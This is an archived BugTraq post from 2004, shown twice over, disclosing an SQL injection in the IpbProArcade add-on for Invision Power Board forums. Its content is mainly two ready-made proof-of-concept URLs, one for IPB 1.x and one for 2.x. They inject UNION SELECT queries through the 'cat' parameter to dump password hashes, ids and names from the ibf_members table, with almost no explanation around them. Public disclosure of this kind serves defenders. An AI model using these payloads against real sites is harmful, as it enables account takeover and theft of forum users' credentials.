BugTraq
Back to list
|
Post reply
IpbProArace 2.5.x SQL injection.
Nov 20 2004 08:05PM
axl daivy (axlownz gmail com)
i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x)
the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire forum system
p.o.c
for ipb 1.x
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,passw
ord,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
for ipb 2.x
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,na
me,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon
cheers
Axl
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x)
the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire forum system
p.o.c
for ipb 1.x
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,passw
ord,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
for ipb 2.x
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,na
me,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon
cheers
Axl
[ reply ]